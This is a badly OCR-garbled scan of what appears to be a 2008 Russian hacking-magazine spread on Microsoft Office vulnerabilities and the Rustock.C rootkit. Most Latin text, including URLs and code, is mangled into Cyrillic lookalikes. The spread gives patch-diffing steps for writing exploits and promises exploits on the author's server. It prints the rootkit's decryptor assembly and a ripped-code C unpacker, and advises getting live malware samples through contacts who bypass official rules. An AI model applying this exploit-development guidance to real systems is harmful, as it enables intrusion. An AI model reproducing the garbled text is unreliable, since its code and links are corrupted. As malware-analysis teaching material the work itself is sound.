ѵиІпегаЫ[і1:іе5/сІІ5р[аѵ.рбр?ісІ=740 и 
зесигіЫосиз.сот/ЫсІ/ЗОбЗЗ . 

Еще одна ошибка индексного пе- 
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репол нения (на этот раз связанная 
с документированной записью 
типа «КЕСОКО», размещенной 
внутри электронной таблицы) 
проходит под кодовым номером 
СѴЕ-2008-3005. Также, как и в пре- 
дыдущем случае, здесь отсутствует 
какой-либо контроль индексов. 

Что позволяет им выходить за 
границы массива, модифицируя 
любую ячейку стековой памяти 
поусмотрению атакующего. А 
вот это уже серьезно! Уязвимость 
носит отнюдь не академический, а 
вполне реалистический харак- 
тер. Впрочем, в поздних версиях 
Офиса, откомпилированных новым 
Си-компилятором от Місгозо!"!:, 
хакер не может ни подменить 
адрес возврата из функции (он 
проверяется перед выходом), ни 
даже перезаписатьуказатели на 
процедуры (они зашифрованы 
псевдослучайным числом, генери- 
руемом при запуске приложения). 
5ЕН-обработчики также убраны из 
стека и вынесены в специальную 
секцию РЕ-файла. Это услож- 
няет атаку, хотя и не делает ее 
невозможной. Тем более, младшие 
версии Офиса (скажем, довольно 
популярный ОІбсеХР) практически 
никак не защищены от хакерской 
агрессии. Атакующим дан зеленый 
свет. Подробную карту маршрута 
можно отрыть на зесигіЫосиз. 
сот/Ьісі/30639 и іаЬз.ісІеі'епзе.сот/ 
іпІеШдепсе/ѵиІпегаЫІібез/сІізрІаѵ. 
рЬо?іб^741 . 

Третья ошибка реализуеттриви- 



альное переполнение буфера (и 
тоже ведет к возможности захвата 
управления). Ехсеі поддерживает 
файлы формата ВІЕЕ, но поддерж- 
ка эта выполнена не вполне 
корректно. При обработке записи 
типа Соипігу (806) программа 
выделяет буфер фиксированного 
размера, копируя туда пользо- 
вательские данные. Проверка 
длины не производится. В резуль- 
тате, содержимое ячеек памяти, 
находящихся за концом буфера, 
затирается и Ехсеі падает — одна- 
ко, передача управления на збеЕ- 
код возможна, особенно в ранних 
версиях Офиса. Ошибке присвоен 
номер ОѴЕ-2008-3006 и более 
подробную информацию можно 
посмотреть на гегосіаѵіпіііаііѵе. 
сот/асІѵізогіез/ХРІ -08-048 . а 
также на зесигіЫосиз. сот/ 
Ыб/30640/іпЬ . 

О последней (четвертой по счету) 
ошибке с номером ОѴЕ-2008-3003 
известно меньше всего. Пришлось 
повозиться с дизассемблером, 
прежде чем я разобрался, что к 
чему. Выяснилось, что багсущест- 
вуеттолько в ОІОсе 2007 и связан 
судаленным доступом кданным 
хізх-файла, явно защищенным 
паролем от посторонних личнос- 
тей, но, поскольку Ехсеі кэширует 
пароль (чтобы не спрашивать 
его у пользователя всякий раз), 
сохраняя его непосредственно в 
самом файле, то атакующий может 
захачить его без особых проблем. 
Во всяком случае, в теории. А на 



практике необходимо, чтобы при 
создании файла использовались 
фрагменты других файлов, забот- 
ливо на чиненные «взрывчаткой». 
Причем, «заимствование» фраг- 
ментов должно осуществляться 
напрямую через буфер обмена без 
всяких«посредников»типа ЕАВ’а, 
удаляющих оттуда все ненужное. 
Кто у нас копирует через ЕАВ?Уж 
точно не секретарши. 

С другой стороны, навязать жер- 
тве свои ресурсы для перетаски- 
вания их в секретный документ 
— крайне затруднительно, и без 
социальной инженерии тут не 
обойтись. Нуа чисто техническую 
информацию можно найти на: 
сѵе.тіЩе.ога/саі-Ьіп/сѵепате. 
саі?пате=СѴЕ-2008-3003 . Пре- 
жде, чем заканчивать с Ехсеі’ем, 
стоит сказать еще одну вещь. Для 
изготовления ехрІоіЕов необ- 
ходимо либо воспользоваться 
официальной спецификацией на 
Ехсеі-форматот МІСГ 050 І 1 : (ищи 
ее на нашем ВѴВ), либо сравнить 
оригинальный и залатанный 
Ехсеі на наличие различий. 
Сравнивать лучше программой 
Ехсеі Ѵіеѵѵег. Она и бесплатная, и 
весит всего несколько метров, так 
что разобраться в ней нетрудно. 
Просто берем хіѵіеѵѵег.ехе с ОѴО и 
устанавливаем программуна вир- 
туальную машину. Делаем бэкап 
всех файлов, затем качаем патч: 
сІоѵѵпІоасІ.тісгозо^Есот/боѵѵпІоасІ/ 
с/а/8/са83а37с-2760-439е-9а5с- 
1 1 485Г260Ьас/оШсе2003-КВ951 589 



-ЕиІІЕіІе-ЕМЦ.ехе . Устанавливаем 
и смотрим различия, которые в 
наглядном виде отображает бес- 
платный РаІсЬВііПполноценный 
аналог коммерческого ВіпОііТа, 
стоящего немереных денег): 
соі.ІепаЫезесигіІѵ.сот/іепаЫе/ 
сІ[.рЬр?р=раІ:сЬсІИ'І'2-2.0.3.2Ір. 



»ТагдеІ5| 



СѴЕ-2008-3004: Ехсе12К5РЗ, 

2К2 5РЗ,2К3 5Р2/5РЗ,ЕхсеІ 
Ѵіеѵѵег2003; СѴЕ-2008-3005: 

Ехсе12К5РЗ, 2К2 5РЗ, СѴЕ-2008- 
3006: Ехсе12К5РЗ, 2К2 5РЗ, 2КЗ 
5Р2/5РЗ,2К7,2К7 5Р1,Ѵіеѵѵег 
2003/5Р1 : СѴЕ-2008-3003: Ехсеі 
2К7,2К7 5Р1. 



» Ехріоід 



Сплоиты находятся в стадии 
активной разработки и пишутся по 
заказу ЕпсІеаѵогЭесигКу, Іпс для 
тестирования набора сигна- 
тур. Крупнейшим поставщиком 
которого она, собственно говоря, и 
является. Поскольку никакие пра- 
ва фирме не передаются, то после 
выпуска сигнатур ехрЫЕы вместе 
с исходным кодом будут опублико- 
ваны и выложены на моем серве- 
ре 



»5оІиІіоп 



Установить заплатки от МісгозоІІ:, 
доступные всем желающим 
(без проверки подлинности 
лицензии) по адресу: тісгозоІ'Е 
сот/іесЬпеДзесигіЫЬииебп/ 
т5Р8-043.т5рх. 



РЬЕОМЛХ Максимум комфорта 

а аепзіЫе Ьіі $АМ$^NС 




ѵѵѵѵѵѵ.затзипдріеотах.сот 

8АМ8^NС С&Т СОКРОПАТIОN 
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М5Р0ѴѴЕРР0ІМТ 

МНОЖЕСТВЕННЫЕОШИБКИ 



» Вгіе^ 



на редко кем используемый РоѵѵегРоіпіѴіеѵѵег. Зато третья распространя- 
ется на все версии Офиса, допуская передачууправления на зЬеи-кодсо 
всеми вытекающими отсюда последствиями. Ноне будем забегать вперед! 
Первая уязвимость (СѴЕ-2008-01 20) связана с классической ошибкой 
строкового переполнения МРС СЗбпд, выделяющей память в куче. Куча 
это дел о такое — достаточно хорошо защищенное в последних версиях ХР 
и Висте, а потому, чтобы забросить на целевую машину зЬеи-код, хакеру 
придется попотеть. Технические подробности находятся на: ІаЬз.ісІеІ'епзе. 
сот/іпІ:еШаепсе/ѵи[пегаЬіІТ!е5/сіІ5РІаѵ.обр?іб-^739. 

Вторая ошибка (СѴЕ-2008-01 21 ), обнаруженная тем же самым исследо- 
вательским коллективом, очень похожа на первыетри ошибки в Ехсеі’е 
— отсутствие проверки границ массива при обработке индексов, выход 
за пределы которого в данном случае даетзамечательную возможность 
перезаписиуказателей на виртуальныефункции, чтообеспечиваетбыст- 
рый и надежный захватуправления, ксожалению, работающий только 
под РоѵѵегРоіпІ: Ѵіеѵѵег’ом. У кого, интересно, он установлен? Впрочем, 
почитать об этой дыре не помешает: [аЬз.ібеІепзе.сот/іпІеІІІаепсо/ 
5оіаѵ.рпр?ісІ=738. 

Третья дыра, затрагивающая все версии Офиса, проходитпод номером 
СѴЕ-2008-1455 и связана с ошибкой парсинга .ррі-файлов. Вызыва- 
етонатрадиционное переполнение буфера с возможностью захвата 
управления. Подробностей известно немного, и я все еще ковыряюсь 
дизассемблером. Почитать кое-какую инфу об уязвимости можно на 
5есцгіІѵ(осц5.сопп/Ьісі/30579/іпІо. 



В РоѵѵегРоіпЕе найденотри критическиеошибки, допускающиеудален- 
ный захватуправления, что реально высаживаетна измену. Если .хіз-фай- 
лы из Сети качают немногие, а по почте их получают, в основном, отболее- 



»ТагдеІ5 



менее«проверенныхлиц»,то ситуация с .ррі: прямо противоположная. В 
Сети болтаются тысячи презентаций в РоѵѵегРоіпІ-формате и не качать 
их почти невозможно. Ксчастью для честных тружен и ков клавиатуры и к 
большомухакерскому огорчению, две из трех ошибок воздействуюттолько 


СѴЕ-2008-0120: 

СѴЕ-2008-0121: 

СѴЕ-2008-1455: 

Ѵіе\л/ег2КЗ. 


РоѵѵегРоіпІ: Ѵіеѵѵег 2003; 

РоѵѵегРоіпІ: Ѵіеѵѵег 2003; 

РоѵѵегРоіпІ 2К 5РЗ, 2К2 5РЗ, 2КЗ 5Р2/5РЗ, 2К7, 2К7 5Р1 , 


Гехническая информация о дыре на сайте Юеі'епзе ЕаЬ^ 
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ІРаІсЬРіІІ в действ~йй| 



» Ехріоііі 



Сплоиты также находятся в стадии активной разработки и пишутся по 
заказу ЕпсІеаѵогЗесигіІу, Іпс. Ищи их позже на моем сервере: пегиті.огд. 
гц/зоигіг/Ьаск . 



»БоІиІіоп 



УстановитьзаплаткиотМісгозоІбдоступныебез проверки подлинности ли- 
цензии, по адресу: глісгозо^І.сотЛесбпеі/зесигіІѵ/Ьииебп/тзОб-ОбІ .тзрх . 



М5 ОРРІСЕ 6РАРН РІІТЕР5 
МНОЖЕСТВЕННЫЕ ОШИБКИ 



» Вгіе^ 



Набор графических фильтров, используемых всеми приложениями Офиса, 
также несвободен отошибок. Уточним: ихтам просто тьма! Последнее 
обновление от МІСГ 050 І 1 :, выпущенное 12 августа, затыкает пять крупных 
дыр, связанных с дефектами обработки файлов следующих форматов: 





РЬЕОМЛХ Максимум звука 
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гоР7 еіліп гііі г 



Спецификация на формат Офисныхфайлов стала открытой] 



ѴѴР6, ЕР5, РІСТ и ВМР В простеньком РІСТ обнаружено сразу 
две дыры. Надо же было так постараться! ВМР-уязвимости 
присвоен номер СѴЕ-2008-3020, а гнездится она в ВМРІМР32. 
ЕЕТ-файле.ТотсчитываетВМР-заголовок, содержащий, 
среди прочего, количество цветов, при превышении которого 
происходит разрушение кучи, допускающее возможность 
захвата управления по вполне стандартному сценарию: Іа^ 
ібе(еп5е.со’ті/іп1еШдепс.е/ѵиІпегаЬЧіЦе5/бТэріаѵ.оЬг)?іб=736. 
Подробно описывать дыры в остальных форматах мне откро- 
веннолениво, поэтомуограничимсятем, что перечислим их 
номера. СѴЕ-2008-3019 — отвечаетза ошибку в ЕР5. Дыры в 
РІСТ награждены номерами СѴЕ-2008-3018и СѴЕ-2008-3021 
(по одному номеру на каждую дыру), а ѴѴР6 (также вызывающий 
контролируемое разрушение кучи) проходит под номером СѴЕ- 
2008-3460 и уже довольно детально исследован хакерами: ІаЬз. 
ібеІеп5е.сот/іп1еиіоегкаа/ѵиіпегар!ІІ1іе5/бі501аѵ.рЬр?іб=736. 



»ТагдеІ5| 



М5 ОІбсе 2К5РЗ, ОІбсе ХР 5РЗ, ОІбсе 2КЗ 5Р2, ОІбсе Рго)ес1 
2К25Р1,М5ѴѴогк58. 




^ееигі^ ѴіііпегаьН К»ёагсіі & Осіётм 





Ьіодз.ІесЬпеЕсогп^зѵѵі — один из немногих блогов Мі сгозоО:, снабжающих нас дейст-| 
■ительно объективной информацией о безопасности! 



► 0б2 
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Товар сертифицирован. Реклама. 



ВЗЛОМ 



» 



Аналог ВіпВіТГа 

Свершилось! Компания ТепаЫе-ЗесигіТу взяла и выпустила 
некоммерческий аналог знаменитого коммерческого ВіпВі^Га от 
2упатіс5, обозвав новинку РаТсЬВі^Гом. Да не просто выпустріла, 
но и обогнала «отца» по функциональности. Казалось бы, что 
такое ВіпВіГ^ и зачем он вообще нужен, когда есть куча всяких 
^с.ехе, сравнивающих бинарные файлы, аѴѴіпВКГзамечательно 
сравнивает текстовые? На самом деле, ВіпНі^^ совсем не то же 
самое, что ^с.ехе. Во-первых, это не самостоятельный продукт, а 
р1и§-іп для ША-Рго. Во-вторых, он сравнивает файлы довольно 
изощренным образом. Анализируя поток управления (со всеми 
ветвлениями), он разбивает его на блоки и, игнорируя мелкие 
различия, занимается поиском масштабных изменений — отыс- 
кивает похожие или полностью идентичные функции, что очень 
полезно при анализе заплаток. Ведь чтобы написать рабочий 
ехріоіц необходимо знать, какая именно дыра была заткнута, а для 
этого необходимо «запеленговать» измененный код. Побайтовое 
сравнение ничего не дает, поскольку заплатка представляет собой 
полностью перекомпилированный файл, как правило, с другими 
ключами оптимизации или даже совершенно другой версией 
компилятора. Короче, смещения всех функций «уплывают», а в са- 
мом коде обнаруживается огромное количество несущественных 
изменений, «ослепляющих» тривиальное побайтовое сравнение. 
Зато анализ потока управления (в смысле, ветвлений) рулит 
только так. Конечно, без ложных срабатываний не обходится, но 
дополнительные проверки и другие подобные изменения обнару- 
живаются без труда и визуализируются в наглядной графической 
форме . Скачать РаЩІіПі^^ можно в любое время дня и ночи : с^і. 
непаЫе^есигігу. сошЛепаЫе /61 .р1ір?р — раі:сМі^52-2 . 0 . 3 . гір Г или 
взять с нашего диска) . 



» ЕхрІоКІ 



Сплоиты будут выложены позже на моем сервере: пегиті.огд.ги/зоигіг/ 
баск. 



РЬЕОМЛХ Максимум информации 

а $еп8ІЫе Ьіі $АМ$^NС 




ѵѵѵѵѵѵ.затзипдріеогпах.сот 

8АМ8ЦМС С&Т С0ПР0ВАТI0N 



* I ИЭ» Т 



Спецификация 

открыта 

15 февраля 2008 года Місгозоіі: выложріла в открытый доступ 
достаточно полную спецификацию формата бинарных файлов, 
используемых в Офисе версий 97-2007. Событие осчастливило 
как создателей бесплатного ПО, вынужденных поддерживать эти 
форматы в своих приложениях, так и хакеров, у которых букваль- 
но крышу срывает от радости. Вряд ли стоит объяснять, насколько 
упрощается анализ заплаток на тот же М5 ѴѴогб при наличии 
спецификации на .бос. Даже и без всяких заплаток — теперь 
можно осознанно экспериментировать с различными полями, 
пытаясь добиться их переполнения. Чем же еще можно объяснить 
взрывной рост дыр, обнаруживаемых в Офисе с конца зимы этого 
года? Если раньше хакерам приходилось блуждать впотьмах, то 
ныне все тайное стало явным! Впрочем, не стоит обольщаться. 
МІСГ 050 І 1 ; изменила бы самой себе, если бы не оставила кучу недо- 
кументированных возможностей (кстати говоря, уже известных 
конкурентам и успешно поддерживаемых пакетом ОрепОШсе, 
исходные тексты которого окажутся замечательным подспорьем 
к документации, выложенной на 
оШсеЬіпагуІ'огтаі:5.т5рх#ЕАВ) . 



»5оІиІіоп 



Как обычно, установить заплатки от МісгозоЙ, доступные всем желаю- 
щим (то есть, без проверки подлинности лицензии) по адресу: тісгозой. 
сотЛесЬпеі/зесигіІѵ/Ьииеб-тчтіяОб 044 .твсх. Если же заплатку по ка- 
ким-либо причинам устанавливать не хочется, можно воспользоваться 
временным обходным решением. Открываем папку ХРгодгат РіІезХ 
Соіптоп РіІезХМісгозобС ЗІіагесіХСгрІіРІСХ, находим там файл 
имя_фильтра . РСІ (для ВМР это будет ВМРІМР32 . Рьт), переимено- 
вываем его, например, в ВМРІМР32 . РВТ_, после чего создаем пустой 
файл ВМРІМР32 . РВТ. Несмотря на отсутствие фильтра, ВМР можно 
будетпо-прежнему им портировать в Офис (в дополнение к на бору фильт- 
ров там имеются и внутренние конверторы), пг 






ѵд^ѵѵ/ 



» 



взлом 




РизІоск.С 



секретные 



в 




ехники анализа 






МИРОВОМ РУТКИТ под МИКРОСКОПОМ 



Легендарно-неуловимому гооіікн’у КизШск.С посвящены десятки техничес- 



ких публикаций, детально описывающих, что именно он делает. Но никто из 
'реп^серов не гов^ит, к^ он это выяснил, какие инструменты и методики 



веские блюда хакерской к 


1 




1 




изІоск.С — словно проливной дождь в знойной пустыне. На- 
стоящий вызов, реально напрягающий мозги и на несколько 
дней (а то и недель) выбивающий хакера из круговорота 
повседневной суеты. Окружающий мир исчезает. Остается 
только монитор, клава, Рустоки бесчисленное множество распеча- 
ток, осенним листопадом падающих на пол. РизЬск.О затягивает, не 
отпуская даже во сне, заставляя подскакивать среди ночи и лихорадоч- 
но опробовать только что вспыхнувшую идею, озарившую, казалось, 
совершенно неразрешимую проблему. 

Детект виртуальных машин, куча антиотладочных приемов, многослой- 
ное шифрование, полиморфный код, жестокая обфускация, привязка к 
зараженной машине. Повсюду нестандартные приемы с трюками, ис- 
пользующимися впервые. И все это на самом низком уровне операцион- 
ной системы в нулевом кольце с активным противодействием ядерным 
отладчикам и детекторам классических руткитов! РизЬск.С — едва ли 
не единственный вирус, заражающий драйвера и умело обходящий 
брандмауэры и антивирусы. Короче, тут есть на чем поработать и чему 
поучиться! 

Как и следует из его названия, РизІоск.С — не первый в своем семейст- 
ве. До него были версии А и В, построенные потомуже принципу, но 
гораздо хуже защищенные, а потому начинающим хакерам рекоменду- 
ется начинать свой путь именно с них. Когда версия В будет разобрана 
по винтикам и байтикам, почеркавтора вируса станетзнаком настолько, 
что «великий и ужасный» ВизЬск.С окажется нетакой уж неразрешимой 



проблемой. Кслову, у меня имеется множество сэмплов, опознаваемых 
антивирусами как ВизІоск.С, но радикально отличающихся поведением 
расшифровщика третьего уровня (в частности, в некоторых сэмплах 
отсутствует привязка к чипсету, которая есть в других). 

Существуетеще версия Е и куча других, однако, анализировать их все 
смысла нет. Вариации нетакужзначительны и ничего нового мы не 
узнаем, а вот времени убьем изрядно. 

Н В ПОИСКАХ кизтоск'А 

Забавно, но даже антивирусным компаниям пришлось всерьез 
напрячься, чтобы раздобыть живые образцы легендарного виру- 
са. Где же брать образцы для анализа? В антивирусные компании 
обращаться бесполезно. Все равно не дадут. Во всяком случае, через 
официальные каналы. А вот по дружбе, в обход всех должностных 
инструкций... Тут можно задействовать профессиональные социаль- 
ные сети, крупнейшей из которых на данный момент является ѵѵѵѵѵѵ. 
[іпкесИп.сот . Грубо говоря, ѵѵѵѵѵѵ. II п кеб іп .сот — то же самое, что 
«Мой мир», только порядка на два круче и реализованный должным 
образом. Имея десято к-д ругой знакомых перво го уровня, через 
списки их контактов можно дотянуться практически до кого угодно, 
а дотянувшись — познакомиться через общих друзей. Используя их 
как залог своей лояльности, что я не пойду и не начну распростра- 
нять полученный образец вируса налево и направо, вполне реально 
добиться своей цели. 




ХАКЕР 09 / 117 / 08 



► 053 




На хакерских форумах ссылки на НизІоск.С (выложенный на «Рапи- 
шиду») попадались не раз и не два, носейчасвсеони битые, однако, 
если запастись терпением, то откопатьживогозверька вполне можно. 
На ѵѵѵѵѵѵ.оИ'епзіѵесопприбпд.пеІ [требуется регистрация) есть один экземпляр 
РизІоск.С, однако — нет дропера. Чтобы заставить «зверька» зарабо- 
тать, придется конкретно напрячься. Хотя после небольшой доработки 
«напильником» он соглашается жить под ѴМѴѴаге и даже размножается 
[нужнотолько «отломать» процедуру детектирования, ну и, конечно, 
подобрать ключ привязки кмашине, шифрующий основной код вируса). 
Другой источниксэмплов — птаІѵѵагесІаІаЬазе.пеДЫод . откуда 
РизІоск.С периодически то появляется, то исчезает. Также мож- 
но влиться в ряды распределенной сети «Маіѵѵаге ОаІаЬазе Оѵег 
□горЬох», где малварьхранится не на публичных серверах [которые 
закрываются также стихийно, как и открываются), а на локальных 
жестких дисках членов сети. Короче говоря, это тот же самый еМиІе, 
только без координирующих серверов. КизІоск.Стам есть, в широ- 
ком ассортименте сэмплов, добытых с различных компьютеров, что 
существенно упрощает анализ, поскольку мусорный код вычищается 
путем сравнивания нескольких образцов друг с другом. Для подклю- 
чения кэтому ресурсу необходимо быть принятым в ряды сообщества 
«Ргоі'еззіопаі Реѵегзе Епдіпеегз & ЕіЫсаІ Наскегз» [ еЬге.соІІесбѵех. 
сот ). Там тоже требуется регистрация, причем регистрация премо- 
дерируемая, то есть координатор вправе немотивированно отка- 
зать. Лично у меня вступление в ряды заняло с неделю достаточно 
оживленной переписки, естественно, на английском — чес-слово, 
процедура устройства в антивирусную компанию с открытием доступа 
к коллекции вирусов отняла гораздо меньше времени. 

Н ЗАТЕРЯННЫЙ В НЕДРАХ КОДА 

Добытый образец КизІоск.С грузим в НІЕѴѴ, ЮА-Рго или Ольгу. Стоп! А 
Ольга тут причем? Ведь РизЬск.С заражает драй вера режима ядра, а 
Ольга работает в прикладном режиме. Впрочем, это совсем не мешает 
ей грузить драйвер как ОН в Ріпд-3 [где драйвер работать не будет, но 
первый уровень шифровки из трех снимается Ольгой на счет «раз»... со 
вторым уже возникают практически непреодолимыетрудности). 

Первый уровень полиморфизмом не страдает и во всех видимых мной 
образцах выглядиттак: 

ПЕРВЫЙУРОВЕНЬ ШИФРОВКИ 



00010200 

00010201 


ризііасі 

тоѵ 


есх, 0000003В5 


00010206 


хог 


еЬх , еЬх 


00010208 


хог 


есіх , есіх 


0001020А 


асісі 


еЬх, 07В5Е0831 


00010210 


асіс 


есіх ,000 



00010213 


(іес 


есх 




00010214 


з' пе 


. 00001020А 


(2 


00010216 


тоѵ 


езі, 000010233 


---V (3 


0001021В 


тоѵ 


есіі , езі 




0001021В 


тоѵ 


есх, 00000ВЕ05 


---V (4 


00010222 


тоѵ 


еах, еЬх 




00010224 


ЗІ1Г 


еах, 003 


; " 1 " 


00010227 


асісі 


есіх, еах 




00010229 


хсВд 


еЬх , есіх 




0001022В 


Іосізсі 






0001022С 


зиЬ 


еах, еЬх 




0001022Е 


зСозсі 






0001022Е 


(іес 


есх 




00010230 


з' пе 


. 000010222 


(5 


00010232 


рорасі 







За концом расшифровщика следует «мусорный» код, который, собственно, 
и расшифровывается. Достаточноустановить точку останова на команду 
РОРАВ, нажать <Р9> (Вип) и первого слоя шифровки какие бывало. Можно 
смело сохранять дамп. 

Решение номердва. Написать скрипт для ІОА-Рго, расшифровывая код 
прямо в дизассемблере [тут исчезают проблемы с возможными ошибка- 
ми сохранения дампа). Способ надежный, ноя ленивы йи потому просто 
рипнул оригинальный код, засунул его в ассемблерную вставку на Си, 
дописал еще несколько строк, расходующихся на файловый ввод/вы- 
вод... Через пару минут появился статический расшифровщик. 

СТАТИЧЕСКИЙ РАСШИФРОВЩИК 

ПЕРВОГО УРОВНЯ С РИПНУТЫМ КОДОМ 

#(іеПіпе ВАЗЕ 0x00010000 



(іесгурр (сііаг *р) { 
азт { 


// гірресі сосіе 


тоѵ 


есх, 0000003В5І1 


хог 


еЬх, еЬх 


хог 


есіх, есіх 


тоѵ 


езі, [р] 


асісі 


езі, 233І1 


3 П2 


зіюгР 1ос_10222 


} 

1 


// епсі оі гір 


/ 

таіп() { 

ЕІЕЕ *1_іп, *1_оиС; 





іпС Ьазе = ВАЗЕ; сііаг *р; 1роз_С роз; 



► 054 
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Первый уровень шифровки снят. За ним и второй! 



( ! (:Е_іп = :Еореп( "гизСоск-с" , "гЬ" ) ) ) 
геСигп ргіпС :Е ( " -ЕКК : ореп гизРоск\п " ) ; 
і:Е ( ! ( :Е_оиР = :Еореп ( " гизРоск-с-ип " , "ѵ^Ь" ) ) ) 
геРигп ргіпРР (" -ЕКК : ореп гизРоск-ип\п" ) ; 
Рзеек(Р_іп, О, ЗЕЕК_ЕЫВ) ; 

РдеРроз ( Р_іп, &роз) ; 

Рзеек(Р_іп, О, ЗЕЕК_ЗЕТ) ; 
р= (скаг*) таііос ( (зІ 2 е_Р)роз) ; 

Ргеасі(р, 1, (іпР) роз, Р_іп) ; 
сіесгурр (р ) ; 

Рѵ^гіРе(р, 1, (іпР)роз, Р_оиР) ; 

Рсіозе ( Р_оиР) ; 

Рсіозе ( Р_іп) ; 

} 

В оригинальном коде расшифровщика потребовалось 
заменить всего одну строку: МОѴ ЕЗІ , 0000102331т -> 
МОѴЕЗІ, [рІ/АЕЕЕЗі, 2 331т (где р - указатель на 
блок памяти, в который загружен расшифровываемый файл, 
а 2331т — смещение первого зашифрованного байта, сле- 
дующего непосредственно за командой рорае). Подобный 
прием (рипанье кода) — весьма эффективный способ для 
борьбы даже с навороченными шифровщиками. Правда, 
если код шифровщика разбросан по десяткам функций, 
«размазанным» по всей программе, рипанье существенно 
усложняется и такие защиты уже предпочтительнее снимать 
в отладчике. 

Расшифрованный РизЬс-С-ипраск загружаем в ЮА-Рго. 
Теперь смотрим на панель навигатора, где синим цветом 
показан код, а серым — данные. Никакие это, конечно, 
не данные, а основное вирусноетело. Зашифрованное, 
разумеется. Расшифровщик второго уровня занимает 
сравнительно небольшую часть, сбившуюся в левый угол, 
однако, не стоит надеяться, что он дастся нам также легко, 
каки предыдущий! 

Попытка визуализации расшифровщика второго уровня 
вгоняет ЮА-Рго в глубокую задумчивость. После которой 
она отображаетжуткое хитросплетение графов, похожее на 
паутину, сотканную обкуренным пауком. 

Гаснут какбычки в писсуаре и попытки трассировки потока 
управления, оставляя нас наедине с кучей функцией, 
условных и безусловных переходов, просмотр которых в ук- 
рупненном масштабе показывает, что РизІоск.С разбивает 
код расшифровщика второго уровня на множество мелких 
блоков. Эти блоки несложно собрать обратно, прогнав 
программу через отладчики построив полную трассу потока 
выполнения. Воттолько сделать это у нас не получится, 
поскольку ВизІоск.С активно сопротивляется отладке! 
Просматривая код распаковщика второго уровня, мы натыка- 
емся на кучу привилегированных команд, включающих в себя 
и обращение котладочным регистрам. На прикладномуровне 
это нетрассируется в принципе, вызывая исключение. 



ПРИВИЛЕГИРОВАННЫЕ МАШИННЫЕ 
КОМАНДЫ В РАСШИФРОВЩИКЕ ВТОРОГО УРОВНЯ 
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[Внешний вид эмулятора хВбети 



Следовательно, мы должны либо модифицировать код, 
переписав его так, чтобы он работал в Віпд-3 без наруше- 
ния функционала — либо воспользоваться эмулятором типа 
х86ети (Ріид-іп для ЮА-Рго), который лучше всего брать 
прямо с СѴ5 [ Шрз://зоигсеІогде.пе1:/рго]есІ:з/ісІа-х86еппи ). 
Там находится самая свежая версия с кучей фиксов, сильно 
отличающая от последнего официального релиза. 

Впрочем, х86ети эмулируетограниченный набор инструк- 
ций/регистров и потому без ручной работы здесь не обой- 
тись. Как вариант, можно попробовать В0СН5 (со встро- 
енным отладчиком). Но В0СН5 очень медленно работает, 
а с популярными отладчиками ядерного уровня РизІоск.С 
ведет отчаянную войну. Потому вовсе не факт, что «живая» 
отладка приведет нас к цели быстрее эмулятора. 

Обращения котладочным регистрам — это еще мелочи. 
Очень быстро мы встречаем код, взаимодействующий 
с ядерной памятью. В частности, следующий фрагмент 
осуществляет разбортаблицы экспорта пЬзкгпІ.ехе на 
предмет поиска необходимых вирусу функций. Какэто он 
делает? Оначала что-то грузит из указателя, полученного из 
Р5:[38Ы, где на прикладном уровне находится «количество 
критических секций», принадлежащих потоку (Ооипі; оі 
оѵѵпесі сгібсаізесбопз). Но ведь ВизІоск.О отнюдь не на при- 
кладном уровне работает! А ядро здесь держит Ргосеззог 
Сопігоі Ведіоп (или, сокращенно, РСР), по смещению 386 
от начала которого лежит указатель на глобальную таблицу 
дескрипторов прерываний (ЮТ). «Смотрит» она непос- 
редственно в ядро (если, конечно, ее никто не захучил). 
Какмы это узнали? Раскладка ядерной памяти хорошо 
описана в документации на 5об:1СЕ, а определения самих 
структур можно найти в МТВВКот Місгозоб: или обратиться к 
замечательному ресурсу «ѴѴіпбоѵѵзѴізІа КегпеІЭігисШгез», 
содержащему практически всю информацию о ядре Висты 
( ѵѵѵѵѵѵ.пігзоІ'Тпеі/кегпеІ зІгисі/ѵізІа/іпсІех.ЫппІ ). 




> Ііпкз 

• Сага отом, как 
сотрудники ВгѴѴеЬ 
ловили Неуловимого 
Джо, а потом пой- 
мали и прищемили: 
сІгѵѵеЬ.сопп/ирІоасІ/ 
а8601а8е66161Г9а9с6 
29с969482б292 
1210059861 
РРОСиМЕМТЭ 
АгОсаІез РРРгѴѴЕВ 
Ризіоск гиз.рбГ 

•Животрепещущая 
история о том, как 
с вируса содрали 
первый слой упаков- 
щика, чему страшно 
возрадовались, но 
застряли во втором, 
который не смог- 
ли пройти даже с 
помощью ЮА-Рго: 
Ыод.ОігеаІехрегЕ 
сот/2008/05/ 
гизіоскс-ипраскіпд- 
пщ5ІеД_-бщи,ЬТшІ . 

• Увлекательная 
детективная история 
с разоблачением... 
нет, не вируса, а его 
создателей, на роль 
которых выдвигаются 
парни с краклаба: 
гооІкіЕсот/пеѵѵзгеаб. 
рЬр?пе\л/5Іб=879 . 



ПРЯМОЙ ПОИСКЯДРА В ПАМЯТИ 
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• Краткое, но самое 
техничное описа- 
ние вируса из всех 
встреченных мною (с 
описанием прохож- 
дения всехуровней 
шифрования): езеГ 
сотЛбгеаЕсепІег/ 
Ыод/?р=127 . 

' • Техничный ана- 

лиз предыдущей 
версии РизІоск.С: 
о[[епзіѵесотриІ:іпд. 

' ЕР ' пе1:/?д=пос1е/331 . 
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Кстати говоря, Іиказг Кѵѵіаіек, также исследовавший КизІоск.С, 
приводиточень похожий, но подозрительно «вылизанный» код [ ѵѵѵѵѵѵ. 
езеІ.сотЛЬгеаІ-сепІег/г Гі), что наводит на определенные 

размышления: либо он дербанил другую версию, либо прогнал код 
через деобфускатор. 



ПРЯМОЙ ПОИСКЯДРА 

В ПАМЯТИ В ВАРИАНТЕ ОТ ЮКА52 КѴѴІАТЕК'А 
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останется только присобачить несложный эмулятор окружения ядра 
(чтобы в селекторе Р5 был не мусор, а валидные данные) и можно смело 
продолжать эмуляцию посредством х86ети. 

Ключевой фрагмент ріид-іп’а, работающий на версиях ЮА-Рго вплоть 
до 4.7 включительно, приведен ниже: 

ЗАГРУЗКА НЕСКОЛЬКИХ ФАЙЛОВ В ОДНУ БАЗУ ІОА-РЯО 4.7 

ѵоісі ісЗаарі гип(іпС агд) 

{ 

1оасі_іп1о_'Ь *1(і; 

\л[агпіпд ( "ріидіп \ "сіиаІ-ІоасіХ " із саііесі!"); 

ІсЗ = Ьиі1(і_1оа(іегз_1ізР ( "КЕЕЫЕЕ32 . ВЕЕ " ) ; 
1оасі_попЫпагу_1і1е ( "КЕЕЫЕЕ32 .ВЕЕ" , 

"КЕЕВЕЕ32 .ВЕЕ" , " . " , 

